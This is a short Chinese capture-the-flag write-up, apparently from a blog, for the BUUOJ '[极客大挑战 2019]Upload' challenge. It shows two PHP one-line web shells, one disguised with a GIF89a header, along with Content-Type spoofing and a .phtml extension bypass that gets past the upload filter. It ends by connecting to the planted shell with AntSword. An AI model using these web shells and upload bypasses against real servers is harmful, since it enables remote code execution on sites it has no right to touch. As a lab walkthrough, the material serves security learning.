当前位置:网站首页>[极客大挑战 2019]Upload
[极客大挑战 2019]Upload
2022-08-09 12:49:00 【开心星人】
evil.php
<?php eval($_POST['evil'])?>
可能是前端的验证或者是后端Content-type的校验。
所以不仅仅是前端的校验。
我们更改Content-Type为image/jpeg
同时更改Content-type为image/jpeg和文件后缀名为jpg(这样可能不会以php解析,所以绕过了后缀名检验也是没有意义的)
尝试将后缀名更改为php3、php4、php5、phtml、pht
发现phtml可以绕过
更换一句话木马
GIF89a? <script language="php">eval($_POST['evil'])</script>
上传成功
访问/upload目录 (猜的,一般都是upload目录)
访问http://2d30c63d-d4db-41c3-9f02-91348f6274c7.node4.buuoj.cn:81/upload/
访问一下我们上传的文件http://2d30c63d-d4db-41c3-9f02-91348f6274c7.node4.buuoj.cn:81/upload/evil.phtml
用antsword连接
根目录下发现flag
边栏推荐
- #WeArePlay | 与更多开发者一起,探索新世界
- 十进制数字→十六进制字符
- Go Affair, How to Become a Gopher and Find a Go Job in 7 Days, Part 1
- 面试题精选:神奇的斐波那契数列
- Unicom network management protocol block diagram
- glibc memory management model freeing C library memory cache
- 工作任务统计
- Redis源码剖析之字典(dict)
- Extract EventBus encapsulation to base class using annotations
- 剑指 Offer 43. 1~n 整数中 1 出现的次数(递归、数学)
猜你喜欢
从NPU-SLAM-EDA技术分析
生成上传密钥和密钥库
Ten minutes to teach you how to use VitePress to build and deploy a personal blog site
造自己的芯,让谷歌买单!谷歌再度开源 180nm 工艺的芯片
uni-app - uview Swiper 轮播图组件点击跳转链接(点击后拿到 item 行数据, 取出数据做操作)
Intra-group reverse order adjustment of K nodes
GIN Bind模式获取参数和表单验证
乐东消防救援大队应邀为干部开展消防安全培训
Uni - app - uview Swiper shuffling figure component, click on the links to jump (click to get the item after the row data, remove data operation)
GIN中GET POST PUT DELETE请求
随机推荐
5G China unicom repeater network management protocol real-time requirements
驻波比计算方法
ctfshow七夕杯2022
FFmpeg多媒体文件处理(ffmpeg操作目录及list的实现)
第六届“强网杯”全国网络安全挑战赛
How to solve the 0x80070005 error when the computer is reinstalled and the system is restored
大佬们,请教一下,我看官方文档中,sqlserver cdc只支持2012版之后的,对于sqlser
5G Unicom Network Management Design Ideas
glibc memory management model freeing C library memory cache
JVM内存泄漏和内存溢出的原因
[FPGA Tutorial Case 48] Image Case 8 - Realization of Converting RGB Image to HSV Image Based on FPGA, Assisted Verification by MATLAB
Introduction to Flutter advanced trip Dialog&Toast (10)
FPGA-近日工作总结
第六届”蓝帽杯“全国大学生网络安全技能大赛 半决赛
GIN Bind模式获取参数和表单验证
Uni - app - uview Swiper shuffling figure component, click on the links to jump (click to get the item after the row data, remove data operation)
基于 R 语言的判别分析介绍与实践 LDA和QDA
ftplib+ tqdm 上传下载进度条
Bitmaps and bit operations
NFS 特别注意权限的问题